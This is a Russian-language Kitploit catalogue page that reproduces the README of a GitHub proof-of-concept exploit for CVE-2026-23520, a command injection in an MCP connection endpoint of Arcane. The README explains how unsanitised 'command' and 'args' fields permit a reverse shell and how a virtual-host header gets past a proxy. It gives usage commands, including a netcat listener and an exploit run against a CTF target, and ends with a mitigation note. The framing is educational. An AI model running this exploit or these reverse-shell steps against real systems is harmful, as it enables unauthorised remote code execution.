Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
-Educational-PoC-CVE-2026-23520 — 🎓 Образовательный PoC для CVE-2026-23520. Лаборатория анализа уязвимостей и контролируемого смягчения. 🧪 | Kitploit
Инструменты/GitHubGitHub/kikechans/-educational-poc-cve-2026-23520
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFКомандование и УправлениеОбучение и Образование
GitHubkikechans/-educational-poc-cve-2026-23520

-Educational-PoC-CVE-2026-23520

🎓 Образовательный PoC для CVE-2026-23520. Лаборатория анализа уязвимостей и контролируемого смягчения. 🧪

Репозиторий
33 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-23520: Протокол контекста модели (MCP) Подключение RCE - Образовательный PoC - Arcane

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Данный репозиторий и содержащиеся в нём скрипты предназначены строго для образовательных и академических целей.

Предоставленная информация предназначена для помощи специалистам по безопасности, системным администраторам и студентам в понимании механики уязвимостей внедрения команд и маршрутизации виртуальных хостов в контролируемых лабораторных средах (например, на платформах Capture The Flag).

Никогда не используйте этот инструмент против любой системы, сети или инфраструктуры без явного письменного разрешения владельца. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением.


Контекст и обзор уязвимости

Данный репозиторий содержит Proof of Concept (PoC) для эксплуатации CVE-2026-23520 в контексте реализации Model Context Protocol (MCP) в определённых стеках приложений (например, Arcane v1.13.0).

Недостаток

Уязвимость представляет собой классическое внедрение команд (Command Injection). Конечная точка API (/api/mcp/connect) принимает JSON-нагрузку для настройки нового подключения к серверу. Нагрузка включает объект serverConfig, содержащий поля и .

command
args

Поскольку приложение не выполняет должную санитизацию этих полей перед выполнением на операционной системе хоста, злоумышленник может подставить вредоносные bash-команды (например, reverse shell) вместо легитимного пути к сервису.

Подвох (Маршрутизация виртуальных хостов)

Во многих реальных или CTF-развёртываниях простая отправка эксплойта на основной IP-адрес приведёт к ошибке 404 Not Found. Это происходит потому, что уязвимый компонент (например, MCPJam Inspector) размещён за обратным прокси-сервером (например, Nginx), который маршрутизирует трафик на основе заголовка Host.

Данный PoC отличается от стандартных эксплойтов тем, что явно позволяет пользователю указать виртуальный хост (vhost) для обхода правил прокси-маршрутизации и прямого попадания на уязвимое приложение.

Использование

Этот скрипт требует Python 3 и библиотеку requests.

root@kitploit:~
pip install requests

Синтаксис

root@kitploit:~
python3 exploit_vhost.py <target_ip> <target_port> <virtual_host> <listener_ip> <listener_port>

Пример (CTF-среда)

  1. Настройте netcat-слушатель на вашей машине:
root@kitploit:~
nc -lvnp 4444
  1. Запустите эксплойт, указав скрытый виртуальный хост:
root@kitploit:~
python3 exploit_vhost.py 10.129.x.x 443 mcp.target.local 10.10.x.x 4444

Примечание: Ошибка «Read timed out» является ожидаемой и указывает на то, что reverse shell был успешно выполнен и удерживает соединение открытым.

Меры защиты

Администраторам следует убедиться, что они используют последнюю пропатченную версию программного обеспечения. Если установка патча невозможна немедленно, ограничьте доступ к конечной точке /api/mcp/connect и обеспечьте строгую валидацию входных данных для всех параметров serverConfig.

Скачать инструмент